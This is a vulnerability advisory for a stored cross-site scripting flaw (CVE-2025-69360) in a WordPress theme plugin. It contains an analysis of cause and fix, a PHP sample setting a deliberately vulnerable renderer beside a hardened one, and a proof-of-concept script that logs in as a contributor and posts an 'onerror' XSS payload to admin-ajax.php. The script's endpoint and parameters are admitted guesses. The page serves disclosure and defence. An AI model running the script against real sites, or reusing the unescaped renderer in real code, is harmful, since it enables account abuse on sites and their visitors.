Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69360: TheGem Theme Elements (for WPBakery) <= 5.11.0 – Authenticated (Contributor+) Stored Cross-Site Scripting (thegem-elements)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 5.11.0
Patched Version
Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69360 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the TheGem Theme Elements plugin for WPBakery, affecting versions up to and including 5.11.0. Attackers with contributor-level or higher WordPress access can inject malicious scripts into pages, and those scripts execute whenever a user views the compromised page. The CVSS 3.1 score of 6.4 (Medium severity) reflects network accessibility, low attack complexity, low privileges required, no user interaction, and a scope change (script supplied to the plugin runs in visitors' browsers), with low confidentiality and integrity impact.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by CWE-79. The vulnerability description explicitly states this cause. Without access to source code, we cannot confirm the exact vulnerable function or hook. The plugin likely fails to properly sanitize user-supplied input before storing it in the database and fails to escape that data before rendering it in a page. This pattern is common in WordPress plugins that handle custom post meta, shortcode attributes, or WPBakery/Elementor element parameters without using standard WordPress sanitization functions like `sanitize_text_field` or escaping functions like `esc_html`.

Exploitation requires an authenticated WordPress user with at least contributor-level privileges. Attackers likely inject XSS payloads through a plugin-specific input field, such as a WPBakery element parameter or a custom meta box, and the payload is stored in the post content or post meta. When the page loads, the unsanitized payload renders and executes in the victim's browser. A realistic payload could be a simple script-execution probe, such as an image tag with an `onerror` handler (the payload used in the PoC below), or a more sophisticated script that exfiltrates data from the victim's session. The attack vector is a POST request to a WordPress admin endpoint, possibly `/wp-admin/admin-ajax.php` with an action parameter like `thegem_elements_action`, or a POST request to the post editor saving custom element data. One caveat: WordPress core already strips disallowed HTML (via KSES) from post content saved by users without the `unfiltered_html` capability, which contributors lack, so a contributor-reachable stored XSS in a plugin normally lives in data the plugin stores and renders itself, such as shortcode attributes or element settings, rather than in the raw post body.

Remediation requires implementing proper input sanitization and output escaping. The patched version (5.11.1) likely added WordPress core sanitization functions (`sanitize_text_field`, `wp_kses_post`) to all user-controlled parameters before database storage. The fix also likely added context-appropriate output escaping when rendering those parameters in frontend or backend pages: `esc_attr` for attribute values, `esc_html` for element text, and `esc_url` for links. Note that input sanitization on its own is defense in depth; escaping at the point of output is what actually prevents the browser from interpreting stored data as markup. For WPBakery integration, the plugin must validate and sanitize all shortcode attributes and element parameters. Atomic Edge analysis suggests the patch focused on the specific component handling user input for TheGem elements.
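
To make the root-cause pattern and the sanitize-then-escape remediation described in the two paragraphs above concrete, here is an added example written for this page, not TheGem's code and not the patch: a minimal shortcode-style element renderer in the vulnerable style, beside a hardened version. WPBakery elements are rendered through shortcodes, so the shape is representative, but the element, its attribute names and the `_shim` helpers are assumptions. The shims approximate `sanitize_text_field`, `esc_attr`, `esc_html` and `shortcode_atts` only so that the script runs outside WordPress; real plugin code must call the core functions (and `esc_url` for links).

```php
<?php
// Added example (not TheGem's code): a shortcode-style element renderer in the
// vulnerable style described above, beside a hardened version.
// Runs offline: the *_shim helpers below approximate WordPress core functions
// and are NOT the real implementations. Plugin code must use the core ones.

// Stand-in for sanitize_text_field(): strip tags and control characters, trim.
function sanitize_text_field_shim(string $value): string {
    $value = strip_tags($value);
    $value = preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    return trim($value);
}

// Stand-ins for esc_attr() / esc_html(): entity-encode for the output context.
function esc_attr_shim(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
function esc_html_shim(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Stand-in for shortcode_atts(): user attributes over defaults, unknown keys dropped.
function shortcode_atts_shim(array $defaults, array $atts): array {
    $out = $defaults;
    foreach ($defaults as $key => $_) {
        if (array_key_exists($key, $atts)) {
            $out[$key] = $atts[$key];
        }
    }
    return $out;
}

// VULNERABLE pattern (CWE-79): attribute values go from the stored shortcode
// straight into HTML, in both attribute and text contexts, with no escaping.
function render_button_vulnerable(array $atts): string {
    $a = shortcode_atts_shim(['title' => 'Click', 'link' => '#', 'css_class' => ''], $atts);
    return '<a class="tg-btn ' . $a['css_class'] . '" href="' . $a['link']
         . '" title="' . $a['title'] . '">' . $a['title'] . '</a>';
}

// HARDENED pattern: sanitize on the way in, then escape for the exact output
// context on the way out (esc_attr for attributes, esc_html for element text).
// Escaping alone would already neutralize the payload; sanitizing is defense in depth.
function render_button_hardened(array $atts): string {
    $a = shortcode_atts_shim(['title' => 'Click', 'link' => '#', 'css_class' => ''], $atts);
    $title = sanitize_text_field_shim($a['title']);
    $class = sanitize_text_field_shim($a['css_class']);
    // Only http(s) links are allowed; javascript:/data: schemes collapse to '#'.
    // (Real code: esc_url(), which applies an allowed-scheme list.)
    $link = preg_match('#^https?://#i', $a['link']) ? $a['link'] : '#';
    return '<a class="tg-btn ' . esc_attr_shim($class) . '" href="' . esc_attr_shim($link)
         . '" title="' . esc_attr_shim($title) . '">' . esc_html_shim($title) . '</a>';
}

// Constructed contributor-supplied attributes (sample input, not captured data),
// shaped like the PoC payload on this page plus two other attribute-context tricks.
$atts = [
    'title'     => '<img src=x onerror=alert("Atomic_Edge_XSS")>',
    'link'      => 'javascript:alert(1)',
    'css_class' => '" onmouseover="alert(2)',
];

echo "Vulnerable:\n", render_button_vulnerable($atts), "\n\n";
echo "Hardened:\n", render_button_hardened($atts), "\n";
```

Run it with `php example.php`. The vulnerable output hands the `onerror` handler, the `javascript:` link and the attribute breakout in `css_class` straight to the browser; the hardened output strips the tag, collapses the link to `#` and entity-encodes the quotes, which is the class of change a CWE-79 fix in this plugin would need to apply to every user-controlled element parameter.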

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of a victim's browser session. This can lead to session hijacking if cookies are stolen, although WordPress sets its authentication cookies with the HttpOnly flag, so script cannot read them directly; the more practical route is to drive authenticated requests from the victim's browser, where the page-embedded nonces are readable by the injected script. Attackers could deface websites by injecting visible content. They could perform actions on behalf of authenticated users, potentially escalating privileges if an administrator views the malicious page. The stored nature means the payload executes for every visitor to the compromised page, amplifying impact. The vulnerability requires contributor-level access, limiting immediate exploitation to trusted users, but compromised contributor accounts or insider threats present real risk.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69360 - TheGem Theme Elements (for WPBakery) <= 5.11.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
/**
 * Proof of Concept for CVE-2025-69360.
 * This script simulates an authenticated attacker with contributor privileges injecting a stored XSS payload.
 * The exact endpoint and parameters are inferred from the plugin slug and typical WPBakery integration patterns;
 * the AJAX action, parameter name and nonce field below are assumptions, not confirmed plugin identifiers.
 * Assumptions:
 * 1. The vulnerability exists in a WPBakery element parameter handled by the plugin.
 * 2. The plugin processes AJAX requests or post saves without proper sanitization.
 * 3. Contributor-level users can edit posts/pages containing TheGem elements.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username   = 'contributor_user';                     // CHANGE THIS - Contributor account
$password   = 'contributor_password';                 // CHANGE THIS
$payload    = '<img src=x onerror=alert("Atomic_Edge_XSS")>'; // Basic XSS payload

// Cookie jar shared across all requests so the WordPress session survives between steps.
$cookie_jar = tempnam(sys_get_temp_dir(), 'wpcookie');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
]);

// Step 1: Authenticate to WordPress. On success wp-login.php sets the wordpress_logged_in_*
// cookie and redirects to redirect_to; on failure the browser is left on wp-login.php.
$login_data = [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
];
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);
if ($response === false) {
    die('Login request failed: ' . curl_error($ch) . "\n");
}
if (strpos(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), 'wp-login.php') !== false) {
    die("Login failed: still on wp-login.php after POST (check credentials).\n");
}

// Step 2: Open the new-post screen as contributor. Contributors can create posts but not publish
// them, so the payload would live in a draft or a post pending review. WordPress creates an
// auto-draft for this screen and, in the classic editor, exposes its ID in a hidden post_ID field.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);
$post_id  = 'new'; // Placeholder kept if the ID cannot be parsed (e.g. block editor markup)
if (preg_match("/name=['\"]post_ID['\"]\s+value=['\"](\d+)['\"]/", $response, $m)) {
    $post_id = $m[1];
}

// Step 3: Submit the payload through the inferred plugin save path.
// The action name, parameter name and nonce field are ASSUMPTIONS. In real testing, parse the
// editor HTML for the plugin's actual AJAX action, parameter names and nonce before sending.
$ajax_data = [
    'action'       => 'thegem_elements_save', // Inferred AJAX action based on plugin slug (assumption)
    'post_id'      => $post_id,
    'element_data' => $payload,               // The assumed unsanitized parameter
    'nonce'        => 'placeholder_nonce',    // Would need extraction from the editor page
];
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
$response = curl_exec($ch);
$status   = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "PoC executed (HTTP $status). Check the response body for success indicators:\n";
echo $response, "\n";
echo "If vulnerable, viewing the created post (ID $post_id) will trigger the XSS payload.\n";

curl_close($ch);
unlink($cookie_jar);
